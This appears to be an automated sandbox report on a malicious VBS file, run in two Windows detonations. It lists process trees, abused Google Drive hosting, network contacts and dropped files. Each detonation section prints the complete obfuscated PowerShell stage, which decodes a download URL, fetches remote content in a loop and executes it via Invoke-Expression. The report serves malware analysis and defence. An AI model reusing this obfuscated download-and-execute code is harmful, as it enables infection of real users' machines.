Analysis Overview
SHA256
83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d
Threat Level: Likely malicious
The file 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-08 07:18
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-08 07:18
Reported
2024-06-08 07:21
Platform
win7-20240508-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2428 wrote to memory of 464 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2428 wrote to memory of 464 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2428 wrote to memory of 464 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 464 wrote to memory of 3064 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 464 wrote to memory of 3064 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 464 wrote to memory of 3064 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Lgknoldet = 1;Function Berringsfladen190($Scratchcard){$Coil=$Scratchcard.Length-$Lgknoldet;$Kodfoderets='Substring';For( $gadebilledet=7;$gadebilledet -lt $Coil;$gadebilledet+=8){$Underargue+=$Scratchcard.$Kodfoderets.Invoke( $gadebilledet, $Lgknoldet);}$Underargue;}function Forlyder($Climata11){ & ($Spatten) ($Climata11);}$benzimidazole=Berringsfladen190 'At,osfrMOsteopeoWheelabzIconveriAnnicaslSquiffilUndisciaSyninge/ Militr5Autobah.R.educa0Nonrege Untast.(ArbejdsWKonsti i UnderlnapiolindThermogoSvensknwPhototusKelpi,g TwofersNNudni.kTEntreat aianis1 Ari.rs0Aminotr. Heglin0Ostraci;Reguler FenolerWBestredi OpremsnBredspe6Kandi,a4Ba depl;Salater TilflyxDirecto6Profite4Hyperfo; Curumi Cam,hacrbrndborvPluri.o:Smit et1Uvaerd 2Undergr1Omlbets.Snitvrk0Phenoge)rgsjler KonsumpG bi.dsee EthanocIlluderk Embo,co Re.ren/Sarcorh2B,edsaa0 Lemmed1Osmousa0Karskca0Teknolo1.nitsel0Fagvide1Enbran, DelthedFtro,ekliM,crospr.iggyslechalanafLeukemio UdpegexM ckere/Klockma1Justtre2l,njefa1Renerne.Unmecha0Sa mens ';$Tirve=Berringsfladen190 'ImpoverUTandlgesMyelineeslickinrReempha- AngepiA BerusegOpinioneEksisten infinitEskimol ';$hawklike=Berringsfladen190 'PaneulohPrinzhot lar.ertDaavildp Si.onisSam.and:Pict.an/Lystopf/outw.rkdFastholrBrut.oiiGestikuvPhocenie Deir r.Huchof,gdissei,oUnbarspo.icondygHalvkuglKlvedese Firepl.Afnati.c IntranoPruditym,pasmol/T.letaduruf sitcSvmmela?Discrete ArchpaxClinoc pTr adreoPatri.trStemmeptF rulem=Asplenidneighboo,dscripw pill anGallardlatomythotautoloaProx,mod Beeroc&D,llerii ChoribdForbrnd=Ostraco1FyrmestRStaminaRSplurgigReprovip Echino_Centr,fRBrnelrdz Rvrdig2Enceph,yClothotpSuitlikiOculonaJforbrydcStreget0Kyphosi0 ,radusN Pi,udipOceanisuFuturisZ T,ille4goo nesPChaperot gyrome-MateriaiAabenbaw Stnned9WellermvMinimumjDeserteKSektion2 Nonmet7Ganglio2grundta ';$Galliwasp=Berringsfladen190 ' Cumbro>Noncura ';$Spatten=Berringsfladen190 'cylindeiAntisipespionsax Lkkers ';$Cestos='Plsebar';$Uncastle = Berringsfladen190 'Skrukh.eVarebetc BoremahResorbeoRebuoya Dobbel%GuldaldaRebunchpUnglac pInstrumd Dent,iaNonsenst Slavd,a .akers% Uncarn\rovsingkKassea r Phyl.oe DammusdT larigiUnraptutCurvulatDonkeyke F somhnInterd,.LeatherN estlndoFunnellnudstykn Tanksta&indenri&populat Sk,vrigeFixearbcUnaturehDespotioRedisti SiegeabtHyleton ';Forlyder (Berringsfladen190 'Minxshi$kazaktagperspe l Yi,esao ellw nbMentoriaMaintailweather:GetatabBGrat,iteFalsknekAl,rinslSt,diecaResign gSluknineForeloulJoniseriJant.rsg HandedeFolkedor Ringvee comedis Angleb=Lsepult(Codesigc Forligm asturtdW.ndfla Coilyea/Wal,mancMilieur unmole$AndensiUOverfornStn,etsc GratisaForv klsArteriotDiphtholSeriocoeVampyr )Imm nas ');Forlyder (Berringsfladen190 'Ekst.at$t,kstmag BalloolTahinamoVan,alibAlgeaspaSusendel Bortad:,iatomeBgaspistuFun.ametValfar.y OutgoilMilitrnaEl.ktrimLiljekoi,ignalbnForbruseDisprop=gy,ospo$VelopdrhefterkraSeksogtwDirekt.kYaqo,aslKradsemiOrd einkSeptleveAscidio.Maaltids UnriskpCoveraglHusstaniEnergimtV,dired(Vlverhu$SprngkrGclo steaArno.islMurmurelGalosheiE fektiwSyskedaa SentimsBancosrpWeelvir)Hemolym ');$hawklike=$Butylamine[0];$Icterine= (Berringsfladen190 'Lysesta$ Unp,esgMisapprlLygtem,oCliquisb ParqueaSuppegrlWooersv:F.rbldtBti,guytrStreli nPallidieSpo,tedsReturneaUndisseaLiv,lanrBortled=Lich opN Celeb,eKalve,rw E,char-Pa,asubOHoverenbHerbagej.ilburseNonpondc U urdet Regara CeilingSCalibrayBreechlsLutianitMancheseCertifimOvulist.Homoc.nNS ldiereO.cultitRa,atou.D.ppelkWHeltindeOutpoisbTruistiCPa,tsuil R,bbiniDyr.naveAk,iespnSelektit');$Icterine+=$Beklageligeres[1];Forlyder ($Icterine);Forlyder (Berringsfladen190 ' Sundhe$ Besku BKampk,ar DopplenPoncedneSjlelivs Khahooa,orestia RigborrUnf.rio.WortworH Fritage MonograDemiss.dkonsumeeHelbredr deconcsDru.maa[Rodkno.$TeleskoTSpk.uggi Unn tirArtillevCoronateCurs,re] Rea,ti=Reperso$AsketerbMiljpaaeBeboelsnbamboozzHal.geniyerkednmPsammopiIndividd commena Lemlstz.ackeysoKildeskl ynenefe Opslmm ');$Vicontiels=Berringsfladen190 ' Cult v$PaginerB Eve,tyrUr,nomenAfgangseRibningsMu icataBesgactaCognat rGenicul.PorphyrDBilandeoargumenwMac.otonEfterralTollek osmlehovaOvervind OversiFTv vlraiTeledenlLeikafoeBitterb(titulad$Data.ash NuleneaEscandawKphjestkLeukstrl Daughti Ug.kork arbuckeRegnska,Galgenf$ AfdampP Uhllost ashpeeeRiddamprAepost oseismomsBrandfapIndsk.ieLedelinr Ejend.mTrffedeo aestrouGalmandswurleyp)Unfavou ';$Pterospermous=$Beklageligeres[0];Forlyder (Berringsfladen190 ' Flyv,r$Plu,aligKompenslA elopro ThreepbGa.tritaKontoralBlommes: Heli.pOOpskrtekOneirosknotkerieFrihederGaneftrn,arkanteAttaindsSpkhugg1Velaryd9Spisefr8Skybru =Amatrni(AnretteTPlisseee MglingsWeirdybtTheoris-kemikalPDeplaneaWackymutSsonerchSrtilfl Noshers$DagtjenPTvivllstAlcaic,eElessarrhaandhvoUdsk.ftsAfstivepUnderekeOpinionrUanseelmcalycoioDelfiunu NidifisVirksom)Pal,ada ');while (!$Okkernes198) {Forlyder (Berringsfladen190 'Roseola$T.lkebigBkke,belOpslideoFa vetabH lverea Trfsikl Becree: rigsrVTakkeklvExtillveTweedjar oliedriStk.ingsFidd eb=Slutdis$PrognostimmoralrFaint su Dis,oneAnissma ') ;Forlyder $Vicontiels;Forlyder (Berringsfladen190 ' Chond.SRet eadtAmm.nitaNondemarMaa,edstSteekin-MarmoreSnetstrmlR,jsebeeTelephoeUnpeacepStr,gsr Bryllup4fire,ar ');Forlyder (Berringsfladen190 'Fo.efal$SporinggMouthp lDdedansoNoexfrdb oughesa nstabil Dephlo: FormueO.panagekEpiz,oakHeweunpe agustircapitulnNonferoeVindikas Karrie1 cciput9Aa.esky8elletre=Adulter(Afsy inTRevivale Ciconis otaltetBumleno-DemagniPPleurocaCorriget.aandudhFrstesa ,linkfy$BrneforPBecommatPlatteneHungerlrSalgssto BortsasFoliernpSindelae ContemrPreheatmZollsuboDicho,duKod ficsproblem)Mink.ar ') ;Forlyder (Berringsfladen190 'Oliefar$Konc rngAnaly.el GlyoxyoRaf.inebDisq,isaZoransbl Arguit:KulturmPOrthoceuVerden,sWigletstEdsformeCaloricrKolonneuDe.elecm FortepmVemo.sse,nlagemnCha,emoe Dimiss=Phellog$NotochogSocketll,ndespooVammelhbBrakvanaByggemylStoette:Kolokv.eEjendomxNonulcecPebbleha undervvRaakremaCrookintSre ebaeDeskr,ps Unfatt+Avenuer+Steffis% Sku.ri$Joypop.BChokolauM.tvasktPriorizyLigaturlMagnascaEarscremStratociFrimeninS.hverteTwe vem.WanglincTruttacoweaseleu.udipednSe,vanttKa.eand ') ;$hawklike=$Butylamine[$Pusterummene];}$unentrapped=293328;$Zooplasty177=30076;Forlyder (Berringsfladen190 'Espe,an$ SelskagSt.gsejlTacheomoSemiquibActuariarecrushl fisker:RelishiAKompromgSemostogCircumfrG,noesee Ensilag,yppelsaB holdntMultisoeKejserptUdkaarisEt.onom Mor,inb=Outbrag TindingGGlycopeeLvs.ovetassurer-EineborC Mol,bdoOptrkkenunl.beltPyrenoieGrskepen Gyrinit F lker Uncolor$ Gluep PFo.dumstEgalitee EmissirScaremoodesertes UnderdpbeadroleComputeropercu mFugtigkoSjllanduColyticsPa idae ');Forlyder (Berringsfladen190 'Enaptse$CurranagPonyerslSlutbetoShoddywbCapsuliaNervulolGospel.: Bur.auR Dysleke O alizlHomotraeSaltiesgGymnasieAshramsrEidologi TuparanFotocelg Sorthae E.odfirScutchen Keelmae RenummsAngrebs Roekamp= Syg.jo Ahoycri[SuperesSUdtagetyLanier,sResprintAirbruseNavle,em Spor.e.Propo,tCEnamou oKonkurrnNeo.acivGladsakeSv,dekurUskoksntproinve]Refinis:Trowser:TaenkteFSerb rarEk pedeoNonellimMiswaytBSa menbaEntredesUnintereSaunder6Aminosy4 ReeshiSCarcinotdukkevorDiptycaiZind.senHelautogStrenge(Grovvar$ MethodAkassablgJackersg EventurShockineAnimistgTrini raBehov.ntPrereveeSlagt,ft LollypsBillige) Predic ');Forlyder (Berringsfladen190 ' Pa til$Dy frosgDesorbel RechaloFortrngbL idensaslavehal,astril:MutismpPSamhrigr ReciviaAfholdei holines C relleBeedigerInd,ere Forhold=Superw pehohom[.earlssSDeci.esybsseninsDiscerpt ybstegeModstanmE.ratum.RestrikT InexoreH,lgenex Sc,phatSpouseh. sningeEBnd llanLejdesacO,erridoFamlesfdDicingoi Thiochn GigologDunamsd] Sp,nta:Stor.ed:KorrigaAFa veglSMill onCRkkeflgI ,ricotIFl essa.ChromomG .ipskgeSorglstt PseudoSBal.egntDmning.rThistediGi.bettnKonsummgrekapit(Trumfst$HudsoniRToys,meeCheesemlRetorsie TransmgKunstmaeBlegso rMetazoai DublednAdvocatgPudderne KnackerFlerdobnWiener,eNiaisgusNo,syll) Bitsto ');Forlyder (Berringsfladen190 'Searcha$Teori.ngrattrailMavercao Unmustb StorfaaSonicatl Decolo: LancerACa,pfirsIltningk Stabile ImpenetSlalomeeUnoilgrn.apperl=un rook$DansetrPFlabederstabelvaRodeoeni ,rydefsretfrd eTaranchrDrif.sp.TopkicksAdhib.tuBe,ryprbGenindssAffronttPiperylrSort.meiindissonLagringgApathi,(No.comp$ThessaluMonostenVeerufyeLaasesmnBescurft Loathsr,uldbryaOperaerpdiskenspVenialieBocher.dTatt dd,Stillin$ReappliZGevreruoslutt dodefencepuretms.l.onsellaMenufilsCataclytTote.ply.erolig1Spidsmu7Mrkelig7Bouillo)Que.ule ');Forlyder $Asketen;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kreditten.Non && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.179.78:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 172.217.20.161:443 | drive.usercontent.google.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt
| MD5 | 36113f68a185488c2fbe2bfcf34bcfdc |
| SHA1 | 3e702a1bda44d41c8fad9ad56039be843c9a0706 |
| SHA256 | fb796fb121a29aed4ca01f2cce8d3b59b70afd4978cbecd25625c2c45812e233 |
| SHA512 | 96bd9b00e3a3a6dc789bbb5414206e826b412596c39044b6c8e5d4a8624d49b75a991714858fa7c7d4bd5864cca82473eb311ef08d2fbddc33e1f7ff3f1ade45 |
memory/464-328-0x000007FEF5F1E000-0x000007FEF5F1F000-memory.dmp
memory/464-329-0x000000001B650000-0x000000001B932000-memory.dmp
memory/464-330-0x0000000001EE0000-0x0000000001EE8000-memory.dmp
memory/464-331-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp
memory/464-332-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp
memory/464-335-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-08 07:18
Reported
2024-06-08 07:21
Platform
win10v2004-20240426-en
Max time kernel
94s
Max time network
95s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2528 wrote to memory of 4808 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2528 wrote to memory of 4808 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4808 wrote to memory of 4776 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 4808 wrote to memory of 4776 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Lgknoldet = 1;Function Berringsfladen190($Scratchcard){$Coil=$Scratchcard.Length-$Lgknoldet;$Kodfoderets='Substring';For( $gadebilledet=7;$gadebilledet -lt $Coil;$gadebilledet+=8){$Underargue+=$Scratchcard.$Kodfoderets.Invoke( $gadebilledet, $Lgknoldet);}$Underargue;}function Forlyder($Climata11){ & ($Spatten) ($Climata11);}$benzimidazole=Berringsfladen190 'At,osfrMOsteopeoWheelabzIconveriAnnicaslSquiffilUndisciaSyninge/ Militr5Autobah.R.educa0Nonrege Untast.(ArbejdsWKonsti i UnderlnapiolindThermogoSvensknwPhototusKelpi,g TwofersNNudni.kTEntreat aianis1 Ari.rs0Aminotr. Heglin0Ostraci;Reguler FenolerWBestredi OpremsnBredspe6Kandi,a4Ba depl;Salater TilflyxDirecto6Profite4Hyperfo; Curumi Cam,hacrbrndborvPluri.o:Smit et1Uvaerd 2Undergr1Omlbets.Snitvrk0Phenoge)rgsjler KonsumpG bi.dsee EthanocIlluderk Embo,co Re.ren/Sarcorh2B,edsaa0 Lemmed1Osmousa0Karskca0Teknolo1.nitsel0Fagvide1Enbran, DelthedFtro,ekliM,crospr.iggyslechalanafLeukemio UdpegexM ckere/Klockma1Justtre2l,njefa1Renerne.Unmecha0Sa mens ';$Tirve=Berringsfladen190 'ImpoverUTandlgesMyelineeslickinrReempha- AngepiA BerusegOpinioneEksisten infinitEskimol ';$hawklike=Berringsfladen190 'PaneulohPrinzhot lar.ertDaavildp Si.onisSam.and:Pict.an/Lystopf/outw.rkdFastholrBrut.oiiGestikuvPhocenie Deir r.Huchof,gdissei,oUnbarspo.icondygHalvkuglKlvedese Firepl.Afnati.c IntranoPruditym,pasmol/T.letaduruf sitcSvmmela?Discrete ArchpaxClinoc pTr adreoPatri.trStemmeptF rulem=Asplenidneighboo,dscripw pill anGallardlatomythotautoloaProx,mod Beeroc&D,llerii ChoribdForbrnd=Ostraco1FyrmestRStaminaRSplurgigReprovip Echino_Centr,fRBrnelrdz Rvrdig2Enceph,yClothotpSuitlikiOculonaJforbrydcStreget0Kyphosi0 ,radusN Pi,udipOceanisuFuturisZ T,ille4goo nesPChaperot gyrome-MateriaiAabenbaw Stnned9WellermvMinimumjDeserteKSektion2 Nonmet7Ganglio2grundta ';$Galliwasp=Berringsfladen190 ' Cumbro>Noncura ';$Spatten=Berringsfladen190 'cylindeiAntisipespionsax Lkkers ';$Cestos='Plsebar';$Uncastle = Berringsfladen190 'Skrukh.eVarebetc BoremahResorbeoRebuoya Dobbel%GuldaldaRebunchpUnglac pInstrumd Dent,iaNonsenst Slavd,a .akers% Uncarn\rovsingkKassea r Phyl.oe DammusdT larigiUnraptutCurvulatDonkeyke F somhnInterd,.LeatherN estlndoFunnellnudstykn Tanksta&indenri&populat Sk,vrigeFixearbcUnaturehDespotioRedisti SiegeabtHyleton ';Forlyder (Berringsfladen190 'Minxshi$kazaktagperspe l Yi,esao ellw nbMentoriaMaintailweather:GetatabBGrat,iteFalsknekAl,rinslSt,diecaResign gSluknineForeloulJoniseriJant.rsg HandedeFolkedor Ringvee comedis Angleb=Lsepult(Codesigc Forligm asturtdW.ndfla Coilyea/Wal,mancMilieur unmole$AndensiUOverfornStn,etsc GratisaForv klsArteriotDiphtholSeriocoeVampyr )Imm nas ');Forlyder (Berringsfladen190 'Ekst.at$t,kstmag BalloolTahinamoVan,alibAlgeaspaSusendel Bortad:,iatomeBgaspistuFun.ametValfar.y OutgoilMilitrnaEl.ktrimLiljekoi,ignalbnForbruseDisprop=gy,ospo$VelopdrhefterkraSeksogtwDirekt.kYaqo,aslKradsemiOrd einkSeptleveAscidio.Maaltids UnriskpCoveraglHusstaniEnergimtV,dired(Vlverhu$SprngkrGclo steaArno.islMurmurelGalosheiE fektiwSyskedaa SentimsBancosrpWeelvir)Hemolym ');$hawklike=$Butylamine[0];$Icterine= (Berringsfladen190 'Lysesta$ Unp,esgMisapprlLygtem,oCliquisb ParqueaSuppegrlWooersv:F.rbldtBti,guytrStreli nPallidieSpo,tedsReturneaUndisseaLiv,lanrBortled=Lich opN Celeb,eKalve,rw E,char-Pa,asubOHoverenbHerbagej.ilburseNonpondc U urdet Regara CeilingSCalibrayBreechlsLutianitMancheseCertifimOvulist.Homoc.nNS ldiereO.cultitRa,atou.D.ppelkWHeltindeOutpoisbTruistiCPa,tsuil R,bbiniDyr.naveAk,iespnSelektit');$Icterine+=$Beklageligeres[1];Forlyder ($Icterine);Forlyder (Berringsfladen190 ' Sundhe$ Besku BKampk,ar DopplenPoncedneSjlelivs Khahooa,orestia RigborrUnf.rio.WortworH Fritage MonograDemiss.dkonsumeeHelbredr deconcsDru.maa[Rodkno.$TeleskoTSpk.uggi Unn tirArtillevCoronateCurs,re] Rea,ti=Reperso$AsketerbMiljpaaeBeboelsnbamboozzHal.geniyerkednmPsammopiIndividd commena Lemlstz.ackeysoKildeskl ynenefe Opslmm ');$Vicontiels=Berringsfladen190 ' Cult v$PaginerB Eve,tyrUr,nomenAfgangseRibningsMu icataBesgactaCognat rGenicul.PorphyrDBilandeoargumenwMac.otonEfterralTollek osmlehovaOvervind OversiFTv vlraiTeledenlLeikafoeBitterb(titulad$Data.ash NuleneaEscandawKphjestkLeukstrl Daughti Ug.kork arbuckeRegnska,Galgenf$ AfdampP Uhllost ashpeeeRiddamprAepost oseismomsBrandfapIndsk.ieLedelinr Ejend.mTrffedeo aestrouGalmandswurleyp)Unfavou ';$Pterospermous=$Beklageligeres[0];Forlyder (Berringsfladen190 ' Flyv,r$Plu,aligKompenslA elopro ThreepbGa.tritaKontoralBlommes: Heli.pOOpskrtekOneirosknotkerieFrihederGaneftrn,arkanteAttaindsSpkhugg1Velaryd9Spisefr8Skybru =Amatrni(AnretteTPlisseee MglingsWeirdybtTheoris-kemikalPDeplaneaWackymutSsonerchSrtilfl Noshers$DagtjenPTvivllstAlcaic,eElessarrhaandhvoUdsk.ftsAfstivepUnderekeOpinionrUanseelmcalycoioDelfiunu NidifisVirksom)Pal,ada ');while (!$Okkernes198) {Forlyder (Berringsfladen190 'Roseola$T.lkebigBkke,belOpslideoFa vetabH lverea Trfsikl Becree: rigsrVTakkeklvExtillveTweedjar oliedriStk.ingsFidd eb=Slutdis$PrognostimmoralrFaint su Dis,oneAnissma ') ;Forlyder $Vicontiels;Forlyder (Berringsfladen190 ' Chond.SRet eadtAmm.nitaNondemarMaa,edstSteekin-MarmoreSnetstrmlR,jsebeeTelephoeUnpeacepStr,gsr Bryllup4fire,ar ');Forlyder (Berringsfladen190 'Fo.efal$SporinggMouthp lDdedansoNoexfrdb oughesa nstabil Dephlo: FormueO.panagekEpiz,oakHeweunpe agustircapitulnNonferoeVindikas Karrie1 cciput9Aa.esky8elletre=Adulter(Afsy inTRevivale Ciconis otaltetBumleno-DemagniPPleurocaCorriget.aandudhFrstesa ,linkfy$BrneforPBecommatPlatteneHungerlrSalgssto BortsasFoliernpSindelae ContemrPreheatmZollsuboDicho,duKod ficsproblem)Mink.ar ') ;Forlyder (Berringsfladen190 'Oliefar$Konc rngAnaly.el GlyoxyoRaf.inebDisq,isaZoransbl Arguit:KulturmPOrthoceuVerden,sWigletstEdsformeCaloricrKolonneuDe.elecm FortepmVemo.sse,nlagemnCha,emoe Dimiss=Phellog$NotochogSocketll,ndespooVammelhbBrakvanaByggemylStoette:Kolokv.eEjendomxNonulcecPebbleha undervvRaakremaCrookintSre ebaeDeskr,ps Unfatt+Avenuer+Steffis% Sku.ri$Joypop.BChokolauM.tvasktPriorizyLigaturlMagnascaEarscremStratociFrimeninS.hverteTwe vem.WanglincTruttacoweaseleu.udipednSe,vanttKa.eand ') ;$hawklike=$Butylamine[$Pusterummene];}$unentrapped=293328;$Zooplasty177=30076;Forlyder (Berringsfladen190 'Espe,an$ SelskagSt.gsejlTacheomoSemiquibActuariarecrushl fisker:RelishiAKompromgSemostogCircumfrG,noesee Ensilag,yppelsaB holdntMultisoeKejserptUdkaarisEt.onom Mor,inb=Outbrag TindingGGlycopeeLvs.ovetassurer-EineborC Mol,bdoOptrkkenunl.beltPyrenoieGrskepen Gyrinit F lker Uncolor$ Gluep PFo.dumstEgalitee EmissirScaremoodesertes UnderdpbeadroleComputeropercu mFugtigkoSjllanduColyticsPa idae ');Forlyder (Berringsfladen190 'Enaptse$CurranagPonyerslSlutbetoShoddywbCapsuliaNervulolGospel.: Bur.auR Dysleke O alizlHomotraeSaltiesgGymnasieAshramsrEidologi TuparanFotocelg Sorthae E.odfirScutchen Keelmae RenummsAngrebs Roekamp= Syg.jo Ahoycri[SuperesSUdtagetyLanier,sResprintAirbruseNavle,em Spor.e.Propo,tCEnamou oKonkurrnNeo.acivGladsakeSv,dekurUskoksntproinve]Refinis:Trowser:TaenkteFSerb rarEk pedeoNonellimMiswaytBSa menbaEntredesUnintereSaunder6Aminosy4 ReeshiSCarcinotdukkevorDiptycaiZind.senHelautogStrenge(Grovvar$ MethodAkassablgJackersg EventurShockineAnimistgTrini raBehov.ntPrereveeSlagt,ft LollypsBillige) Predic ');Forlyder (Berringsfladen190 ' Pa til$Dy frosgDesorbel RechaloFortrngbL idensaslavehal,astril:MutismpPSamhrigr ReciviaAfholdei holines C relleBeedigerInd,ere Forhold=Superw pehohom[.earlssSDeci.esybsseninsDiscerpt ybstegeModstanmE.ratum.RestrikT InexoreH,lgenex Sc,phatSpouseh. sningeEBnd llanLejdesacO,erridoFamlesfdDicingoi Thiochn GigologDunamsd] Sp,nta:Stor.ed:KorrigaAFa veglSMill onCRkkeflgI ,ricotIFl essa.ChromomG .ipskgeSorglstt PseudoSBal.egntDmning.rThistediGi.bettnKonsummgrekapit(Trumfst$HudsoniRToys,meeCheesemlRetorsie TransmgKunstmaeBlegso rMetazoai DublednAdvocatgPudderne KnackerFlerdobnWiener,eNiaisgusNo,syll) Bitsto ');Forlyder (Berringsfladen190 'Searcha$Teori.ngrattrailMavercao Unmustb StorfaaSonicatl Decolo: LancerACa,pfirsIltningk Stabile ImpenetSlalomeeUnoilgrn.apperl=un rook$DansetrPFlabederstabelvaRodeoeni ,rydefsretfrd eTaranchrDrif.sp.TopkicksAdhib.tuBe,ryprbGenindssAffronttPiperylrSort.meiindissonLagringgApathi,(No.comp$ThessaluMonostenVeerufyeLaasesmnBescurft Loathsr,uldbryaOperaerpdiskenspVenialieBocher.dTatt dd,Stillin$ReappliZGevreruoslutt dodefencepuretms.l.onsellaMenufilsCataclytTote.ply.erolig1Spidsmu7Mrkelig7Bouillo)Que.ule ');Forlyder $Asketen;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kreditten.Non && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.179.78:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 78.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 172.217.20.161:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 161.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt
| MD5 | 290fae52f17dbaeec503dfb5d085abff |
| SHA1 | fdae242a21f6383d0d5aab98f1bf1f3768d833b6 |
| SHA256 | d2390d6c0c3ba3ae1422d582888dcadcb05c387567e3000eb148da64aeb364e9 |
| SHA512 | 7f6d352a85b7fb6c5f5d5d2d76bd081a525ff941b28f481d166a054dbbdcbe0aa4640ea6eb31b226d59f94a4cd5a549df9f041880e481ff397294a048a7a280b |
C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt
| MD5 | e3c54d10d7b28f4437e5082454a22cb7 |
| SHA1 | f5d6c9ff3d8bebf64c7a03416e005aea2f72f82e |
| SHA256 | 4641feef049099ee8406644631ffb5a83d07c631c29f15490824d649c52c868b |
| SHA512 | f26f744f344c692551d23f0d8281f27bd2bd6de2263b89c1642f3196ac90c28337019e5d47e9b88cf2e607b5a3e70f3c30f9ee94fb9fae43b4f3a351cd309fc6 |
C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt
